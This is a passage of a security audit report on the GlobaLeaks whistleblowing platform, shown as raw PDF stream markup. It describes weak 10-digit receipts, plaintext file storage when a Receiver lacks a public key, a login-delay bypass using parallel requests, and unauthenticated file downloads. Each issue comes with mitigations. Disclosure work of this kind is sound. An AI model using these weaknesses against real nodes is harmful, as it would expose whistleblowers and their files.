23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .525777 Tw (If there are 10 existing receipts, the attacker should find one of them in about 186 hours \(8 days\) of) Tj T* 0 Tw (guessing.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 426.0236 cm Q q 1 0 0 1 62.69291 414.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (If there is one existing receipt, the attacker should find it in about 58 days of guessing.) 
Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 414.0236 cm Q q 1 0 0 1 62.69291 384.0236 cm q BT 1 0 0 1 0 14 Tm .66998 Tw 12 TL /F1 10 Tf 0 0 .501961 rg (Appendix E. Computing Multiple Target Guessing Success Probabilities ) Tj 0 0 0 rg (explains how these figures were) Tj T* 0 Tw (computed.) Tj T* ET Q Q q 1 0 0 1 62.69291 342.0236 cm q BT 1 0 0 1 0 26 Tm 1.752651 Tw 12 TL /F1 10 Tf 0 0 0 rg (Even though ) Tj /F3 10 Tf (scrypt ) Tj /F1 10 Tf (with the parameters ) Tj /F3 10 Tf (N=2^14) Tj /F1 10 Tf (, ) Tj /F3 10 Tf (r=8) Tj /F1 10 Tf (, ) Tj /F3 10 Tf (p=1) Tj /F1 10 Tf (, and ) Tj /F3 10 Tf (buflen=64 ) Tj /F1 10 Tf (is used to hash the) Tj T* 0 Tw .537882 Tw (receipts, if an attacker learns one of the hashes, it should be trivial to run an offline brute-force search of) Tj T* 0 Tw (the entire keyspace.) Tj T* ET Q Q q 1 0 0 1 62.69291 324.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Verification: ) Tj /F1 10 Tf (Verified by using the software and by source code inspection.) Tj T* ET Q Q q 1 0 0 1 62.69291 306.0236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Vulnerability Description:) Tj T* ET Q Q q 1 0 0 1 62.69291 288.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (The default receipt-generation pattern is defined in ) Tj /F3 10 Tf (globaleaks/settings.py) Tj /F1 10 Tf (, line 170:) Tj T* ET Q Q q 1 0 0 1 62.69291 254.8236 cm q q 1 0 0 1 0 0 cm q 1 0 0 1 6.6 6.6 cm q .662745 .662745 .662745 RG .5 w .960784 .960784 .862745 rg n -6 -6 468.6898 24 re B* Q q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F3 10 Tf 12 TL (self.defaults.receipt_regexp = u'[0-9]{10}') Tj T* ET Q Q Q Q Q q 1 0 0 1 62.69291 234.8236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (This default specifies a sequence of 10 digits, yielding ) Tj /F3 10 Tf (10^10 ) Tj /F1 10 Tf (possibilities, or about 34 bits of entropy.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 192.8236 cm q BT 1 0 0 1 0 26 Tm 2.202651 Tw 12 TL /F1 10 Tf 0 0 0 rg (Even disregarding malicious actors, the chance that a Node will issue the same receipt for different) Tj T* 0 Tw 1.354104 Tw (submissions is notable. The chance of a collision is expected to reach 50% as the number of receipts) Tj T* 0 Tw (approaches ) Tj /F3 10 Tf (sqrt\(10^10\)) Tj ( ) Tj (=) Tj ( ) Tj (10^5 ) Tj /F1 10 Tf (or 10,000 receipts.) Tj T* ET Q Q q 1 0 0 1 62.69291 162.8236 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .042765 Tw (Receipts are also hashed with a fixed per-Node salt. If an attacker gains access to these hashes, they can) Tj T* 0 Tw (perform an offline attack.) Tj T* ET Q Q q 1 0 0 1 62.69291 144.8236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Mitigation:) Tj T* ET Q Q q 1 0 0 1 62.69291 114.8236 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .900814 Tw (There are several potentially competing goals which affect mitigation: usability, plausible deniability, and) Tj T* 0 Tw (brute force protection.) Tj T* ET Q Q q 1 0 0 1 62.69291 84.82362 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .746136 Tw (We recommend notifying Node administrators presenting the findings of this issue, then instructing them) Tj T* 0 Tw (to make an informed tradeoff between these goals.) 
Tj T* ET Q Q endstream endobj % 'R356': class PDFStream 356 0 obj % page stream << /Length 4651 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 753.0236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (If the Node administrator selects a policy which is:) Tj T* ET Q Q q 1 0 0 1 62.69291 747.0236 cm Q q 1 0 0 1 62.69291 747.0236 cm Q q 1 0 0 1 62.69291 735.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F4 10 Tf 0 0 0 rg (stronger protection ) Tj /F1 10 Tf (against guessing attacks,) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 729.0236 cm Q q 1 0 0 1 62.69291 705.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm 2.36186 Tw 12 TL /F4 10 Tf 0 0 0 rg (does not provide plausible deniability ) Tj /F1 10 Tf (by dint of having the same number of digits as a phone) Tj T* 0 Tw (number, and) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 699.0236 cm Q q 1 0 0 1 62.69291 687.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F4 10 Tf 0 0 0 rg (poorer usability ) Tj /F1 10 Tf (due to longer receipts, then:) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 687.0236 cm Q q 1 0 0 1 62.69291 669.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (-they should change the ) Tj /F3 10 Tf (receipt_regexp ) Tj /F1 10 Tf (to: ) Tj /F3 10 Tf ([0-9a-z]{16}) Tj T* ET Q Q q 1 0 0 1 62.69291 651.0236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (If the Node administrator selects a policy which is:) Tj T* ET Q Q q 1 0 0 1 62.69291 645.0236 cm Q q 1 0 0 1 62.69291 645.0236 cm Q q 1 0 0 1 62.69291 633.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 
Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F4 10 Tf 0 0 0 rg (vulnerable ) Tj /F1 10 Tf (to guessing attacks, as specified by the timing predictions above,) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 627.0236 cm Q q 1 0 0 1 62.69291 603.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm .93811 Tw 12 TL /F4 10 Tf 0 0 0 rg (does provide plausible deniability ) Tj /F1 10 Tf (by dint of having the same number of digits as a phone number,) Tj T* 0 Tw (and) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 597.0236 cm Q q 1 0 0 1 62.69291 585.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F4 10 Tf 0 0 0 rg (better usability ) Tj /F1 10 Tf (due to shorter receipts, then:) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 585.0236 cm Q q 1 0 0 1 62.69291 567.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (-they should leave the ) Tj /F3 10 Tf (receipt_regexp ) Tj /F1 10 Tf (at the current default of: ) Tj /F3 10 Tf ([0-9]{10}) Tj T* ET Q Q q 1 0 0 1 62.69291 549.0236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Remediation:) Tj T* ET Q Q q 1 0 0 1 62.69291 507.0236 cm q BT 1 0 0 1 0 26 Tm 2.869318 Tw 12 TL /F1 10 Tf 0 0 0 rg (As of this report writing, we have not settled on a concrete remediation recommendation. We are) Tj T* 0 Tw .275984 Tw (continuing to explore remediation options as well as clarifying the criteria related to usability, plausible) Tj T* 0 Tw (deniability, and brute force resistance in ) Tj 0 0 .501961 rg (GlobaLeaks Issue Ticket #823) Tj T* ET Q Q q 1 0 0 1 62.69291 477.0236 cm q BT 1 0 0 1 0 14 Tm .719984 Tw 12 TL /F2 10 Tf 0 0 0 rg (Status: ) Tj /F1 10 Tf (Confirmed by code inspection. 
Our feasibility is based on estimates and we have not developed) Tj T* 0 Tw (proof-of-concept guessing attacks.) Tj T* ET Q Q q 1 0 0 1 62.69291 471.0236 cm Q q 1 0 0 1 62.69291 471.0236 cm Q q 1 0 0 1 62.69291 459.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (This issue is tracked in ) Tj 0 0 .501961 rg (GlobaLeaks Issue Ticket #823) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 459.0236 cm Q q 1 0 0 1 62.69291 459.0236 cm Q endstream endobj % 'R357': class PDFStream 357 0 obj % page stream << /Length 7695 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 750.0236 cm q BT 1 0 0 1 0 2.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (Issue D. A Receiver Can Suppress File Encryption With No Warning to Others) Tj T* ET Q Q q 1 0 0 1 62.69291 732.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Reported: ) Tj /F1 10 Tf (2014-01-30) Tj T* ET Q Q q 1 0 0 1 62.69291 690.0236 cm q BT 1 0 0 1 0 26 Tm 2.203984 Tw 12 TL /F2 10 Tf 0 0 0 rg (Synopsis: ) Tj /F1 10 Tf (If a Receiver is configured without a public key, submitted files remain on the filesystem) Tj T* 0 Tw 1.497318 Tw (unencrypted. The admin sees no sign of this unless they open Receivers Configuration, click on each) Tj T* 0 Tw (Receiver, and check each for an "Encryption not enabled!" warning.) Tj T* ET Q Q q 1 0 0 1 62.69291 660.0236 cm q BT 1 0 0 1 0 14 Tm 1.260751 Tw 12 TL /F2 10 Tf 0 0 0 rg (Impact: ) Tj /F1 10 Tf (A negligent, malicious, or compromised Receiver account can expose a Node administrator to) Tj T* 0 Tw (unexpected liability.) Tj T* ET Q Q q 1 0 0 1 62.69291 642.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Attack Resources: ) Tj /F1 10 Tf (The attacker needs to control a Receiver account.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 612.0236 cm q BT 1 0 0 1 0 14 Tm .39811 Tw 12 TL /F2 10 Tf 0 0 0 rg (Feasibility: ) Tj /F1 10 Tf (This issue is quite feasible on real installations given that Receivers may not share the same) Tj T* 0 Tw (level of risk aversion as the Node administrator, or Receivers may be negligent, naive, or malicious.) Tj T* ET Q Q q 1 0 0 1 62.69291 594.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Verification: ) Tj /F1 10 Tf (Verified by using the software, inspecting the filesystem, and reading the source.) Tj T* ET Q Q q 1 0 0 1 62.69291 576.0236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Vulnerability Description:) Tj T* ET Q Q q 1 0 0 1 62.69291 534.0236 cm q BT 1 0 0 1 0 26 Tm .045976 Tw 12 TL /F1 10 Tf 0 0 0 rg (In ) Tj /F3 10 Tf (globaleaks/jobs/delivery_sched.py) Tj /F1 10 Tf ( ) Tj /F3 10 Tf (APSDelivery ) Tj /F1 10 Tf (runs shortly after file upload. It leaves the) Tj T* 0 Tw .216654 Tw (plaintext file on disk unless all Receivers have a public key configured at that time. Once a Receiver's key) Tj T* 0 Tw (is added, files already on the filesystem for that Receiver do not become encrypted.) Tj T* ET Q Q q 1 0 0 1 62.69291 504.0236 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL 1.574651 Tw (A Receiver sees the decrypted files regardless. However, this way a careless Receiver can make the) Tj T* 0 Tw (whole Node more vulnerable to an attacker.) Tj T* ET Q Q q 1 0 0 1 62.69291 462.0236 cm q 0 0 0 rg BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL .384987 Tw (A special case of this issue is that Receivers who have public keys configured will see files as encrypted,) Tj T* 0 Tw 1.211567 Tw (even though they may actually be stored in plain text on the disk for other Receivers. This may give a) Tj T* 0 Tw (false sense of security and might affect advice they give to the Whistleblower.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 444.0236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Mitigation:) Tj T* ET Q Q q 1 0 0 1 62.69291 414.0236 cm q BT 1 0 0 1 0 14 Tm 1.089213 Tw 12 TL /F1 10 Tf 0 0 0 rg (To mitigate this issue, ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (Node administrators should regularly ensure that all Receivers have) Tj T* 0 Tw (public keys configured, and should manually check the uploaded files to verify that they are all encrypted.) Tj T* ET Q Q q 1 0 0 1 62.69291 372.0236 cm q BT 1 0 0 1 0 26 Tm 8.403314 Tw 12 TL /F1 10 Tf 0 0 0 rg (The ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (Node administrator can check if there are plaintext files by running) Tj T* 0 Tw 7.435529 Tw /F3 10 Tf (file) Tj ( ) Tj (/var/globaleaks/files/submission/* ) Tj /F1 10 Tf (and looking for files whose type is not) Tj T* 0 Tw /F3 10 Tf (PGP) Tj ( ) Tj (message) Tj /F1 10 Tf (.) Tj T* ET Q Q q 1 0 0 1 62.69291 354.0236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Remediation:) Tj T* ET Q Q q 1 0 0 1 62.69291 324.0236 cm q BT 1 0 0 1 0 14 Tm .237318 Tw 12 TL /F1 10 Tf 0 0 0 rg (Being able to accept non-encrypted submissions may be an important use case for ) Tj /F4 10 Tf (GlobaLeaks) Tj /F1 10 Tf (. As such,) Tj T* 0 Tw (we make the following suggestions:) Tj T* ET Q Q q 1 0 0 1 62.69291 318.0236 cm Q q 1 0 0 1 62.69291 318.0236 cm Q q 1 0 0 1 62.69291 294.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm 3.336136 Tw 12 TL /F1 10 Tf 0 0 0 rg (By default, ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (should refuse Tips unless the files will be encrypted, only accepting) Tj T* 0 Tw (unencrypted submissions after the Node administrator ) Tj /F4 10 Tf (explicitly ) Tj /F1 10 Tf (opts-in to receiving plaintext files.) 
Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 288.0236 cm Q q 1 0 0 1 62.69291 276.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Whistleblowers should be warned before uploading files that will not be encrypted.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 270.0236 cm Q q 1 0 0 1 62.69291 246.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .669318 Tw (Warn the Node administrator that some Receivers do not have public keys configured, or make the) Tj T* 0 Tw (existing warnings more prominent.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 240.0236 cm Q q 1 0 0 1 62.69291 180.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 45 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 33 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL 2.50186 Tw (Warn other receivers when the file has been encrypted to them but is in plaintext for another) Tj T* 0 Tw (receiver.) Tj T* ET Q Q q 1 0 0 1 23 27 cm Q q 1 0 0 1 23 -3 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET BT 1 0 0 1 0 2 Tm T* ET q 1 0 0 1 20 24 cm Q q 1 0 0 1 20 24 cm Q q 1 0 0 1 20 0 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm 1.779982 Tw 12 TL /F1 10 Tf 0 0 0 rg (This may not be an acceptable solution, since according to ) Tj 0 0 .501961 rg (GlobaLeaks ticket 672) Tj 0 0 0 rg (, the) Tj T* 0 Tw (receivers should not know which other receiver received the file.) 
Tj T* ET Q Q q Q Q q 1 0 0 1 20 0 cm Q q Q Q q 1 0 0 1 23 -3 cm Q q Q Q q 1 0 0 1 62.69291 180.0236 cm Q q 1 0 0 1 62.69291 162.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Status: ) Tj /F1 10 Tf (The issue has been verified.) Tj T* ET Q Q q 1 0 0 1 62.69291 156.0236 cm Q q 1 0 0 1 62.69291 156.0236 cm Q q 1 0 0 1 62.69291 144.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (This issue is tracked in ) Tj 0 0 .501961 rg (GlobaLeaks Issue Ticket #824) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 144.0236 cm Q q 1 0 0 1 62.69291 144.0236 cm Q endstream endobj % 'R358': class PDFStream 358 0 obj % page stream << /Length 5312 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 750.0236 cm q BT 1 0 0 1 0 2.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (Issue E. Parallel Requests Bypass Exponentially Increasing Login Delay) Tj T* ET Q Q q 1 0 0 1 62.69291 732.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Reported: ) Tj /F1 10 Tf (2014-01-30) Tj T* ET Q Q q 1 0 0 1 62.69291 702.0236 cm q BT 1 0 0 1 0 14 Tm .576647 Tw 12 TL /F2 10 Tf 0 0 0 rg (Synopsis:) Tj /F1 10 Tf ( ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (implements an exponentially-increasing delay when a login fails. An attacker can) Tj T* 0 Tw (get around this by sending requests in parallel.) Tj T* ET Q Q q 1 0 0 1 62.69291 684.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Impact: ) Tj /F1 10 Tf (An attacker can perform online login guessing attacks faster than expected.) Tj T* ET Q Q q 1 0 0 1 62.69291 654.0236 cm q BT 1 0 0 1 0 14 Tm .461318 Tw 12 TL /F2 10 Tf 0 0 0 rg (Attack Resources: ) Tj /F1 10 Tf (To perform this attack, the attacker must be able to establish multiple connections to) Tj T* 0 Tw (the ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (web server in parallel.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 636.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Feasibility: ) Tj /F1 10 Tf (This issue can be exploited by simply making requests in parallel rather than in series.) Tj T* ET Q Q q 1 0 0 1 62.69291 606.0236 cm q BT 1 0 0 1 0 14 Tm .275984 Tw 12 TL /F2 10 Tf 0 0 0 rg (Verification: ) Tj /F1 10 Tf (Verified by source code inspection and testing with the script provided in ) Tj /F4 10 Tf (Appendix C. Script) Tj T* 0 Tw (for Issue E) Tj /F1 10 Tf (. When requests are made sequentially, they are held up. When made in parallel, they aren't.) Tj T* ET Q Q q 1 0 0 1 62.69291 588.0236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Vulnerability Description:) Tj T* ET Q Q q 1 0 0 1 62.69291 546.0236 cm q BT 1 0 0 1 0 26 Tm 29.84854 Tw 12 TL /F1 10 Tf 0 0 0 rg (The login delay is implemented in ) Tj /F3 10 Tf (security_sleep\(\) ) Tj /F1 10 Tf (in) Tj T* 0 Tw 1.128863 Tw /F3 10 Tf (globaleaks/handlers/authentication.py) Tj /F1 10 Tf (. It is done by calling ) Tj /F3 10 Tf (callLater\(\)) Tj /F1 10 Tf (, which will freeze) Tj T* 0 Tw (the current connection, but will not prevent the attacker from opening a new one.) Tj T* ET Q Q q 1 0 0 1 62.69291 504.0236 cm q BT 1 0 0 1 0 26 Tm 2.555697 Tw 12 TL /F1 10 Tf 0 0 0 rg (The current defense only becomes effective when the attacker has exhausted all of the concurrent) Tj T* 0 Tw 2.934147 Tw (connections that the ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (can accept, and ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (cannot accept any more concurrent) Tj T* 0 Tw (connections, i.e. it is effectively under denial of service.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 486.0236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Mitigation:) Tj T* ET Q Q q 1 0 0 1 62.69291 444.0236 cm q BT 1 0 0 1 0 26 Tm .163984 Tw 12 TL /F1 10 Tf 0 0 0 rg (To mitigate this issue, ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (Node administrators should monitor the rate of login requests to detect) Tj T* 0 Tw .099988 Tw (an attack and respond by either shutting down the server or using a firewall to rate-limit the attacker. To) Tj T* 0 Tw (monitor the number of concurrent connections, the ) Tj /F3 10 Tf (netstat) Tj ( ) Tj (-ptan ) Tj /F1 10 Tf (command can be used.) Tj T* ET Q Q q 1 0 0 1 62.69291 426.0236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Remediation:) Tj T* ET Q Q q 1 0 0 1 62.69291 372.0236 cm q BT 1 0 0 1 0 38 Tm 3.251163 Tw 12 TL /F1 10 Tf 0 0 0 rg (It is difficult to find a long-term solution to this problem, since all of the obvious solutions make) Tj T* 0 Tw .930697 Tw /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (more vulnerable to denial of service attacks. A possible solution might involve requiring the) Tj T* 0 Tw 2.583828 Tw (client to solve a computationally- and memory-hard proof of work challenge for each authentication) Tj T* 0 Tw (request. We leave this for future work.) Tj T* ET Q Q q 1 0 0 1 62.69291 354.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Status: ) Tj /F1 10 Tf (Confirmed.) Tj T* ET Q Q q 1 0 0 1 62.69291 348.0236 cm Q q 1 0 0 1 62.69291 348.0236 cm Q q 1 0 0 1 62.69291 324.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm .199983 Tw 12 TL /F4 10 Tf 0 0 0 rg (Update 2014-02-06 ) Tj /F1 10 Tf (- This issue may be related to ) Tj 0 0 .501961 rg (GlobaLeaks ticket 782 ) Tj 0 0 0 rg (or ) Tj 0 0 .501961 rg (GlobaLeaks Submission) Tj T* 0 Tw (Flood Resiliency Project ) Tj 0 0 0 rg (are directly relevant.) 
Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 318.0236 cm Q q 1 0 0 1 62.69291 306.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (This issue is tracked in ) Tj 0 0 .501961 rg (GlobaLeaks Issue Ticket #825) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 306.0236 cm Q q 1 0 0 1 62.69291 306.0236 cm Q endstream endobj % 'R359': class PDFStream 359 0 obj % page stream << /Length 6874 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 750.0236 cm q BT 1 0 0 1 0 2.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (Issue F. Tip Files Can Be Downloaded Without Authenticating) Tj T* ET Q Q q 1 0 0 1 62.69291 732.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Reported: ) Tj /F1 10 Tf (2014-02-07) Tj T* ET Q Q q 1 0 0 1 62.69291 678.0236 cm q BT 1 0 0 1 0 38 Tm .644651 Tw 12 TL /F2 10 Tf 0 0 0 rg (Synopsis:) Tj /F1 10 Tf ( ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (does not check if the user is authenticated when downloading files. The files are) Tj T* 0 Tw 1.550651 Tw (protected only with a string generated by ) Tj /F3 10 Tf (uuid4\(\)) Tj /F1 10 Tf (, which might be predictable \(see ) Tj 0 0 .501961 rg (Issue K: Secrets) Tj T* 0 Tw .336412 Tw (Generated with Non-CSPRNG) Tj 0 0 0 rg (\), or vulnerable to side-channel attacks \(see ) Tj 0 0 .501961 rg (Issue J: Attacker May Be Able) Tj T* 0 Tw (To Extract Secrets Through Side-Channel Attacks) Tj 0 0 0 rg (\).) Tj T* ET Q Q q 1 0 0 1 62.69291 660.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Impact: ) Tj /F1 10 Tf (An attacker can access the files associated with a Tip.) Tj T* ET Q Q q 1 0 0 1 62.69291 630.0236 cm q BT 1 0 0 1 0 14 Tm .111163 Tw 12 TL /F2 10 Tf 0 0 0 rg (Attack Resources: ) Tj /F1 10 Tf (The attacker needs to know the file or collection download token, and must be able to) Tj T* 0 Tw (make requests to the ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (Node.) 
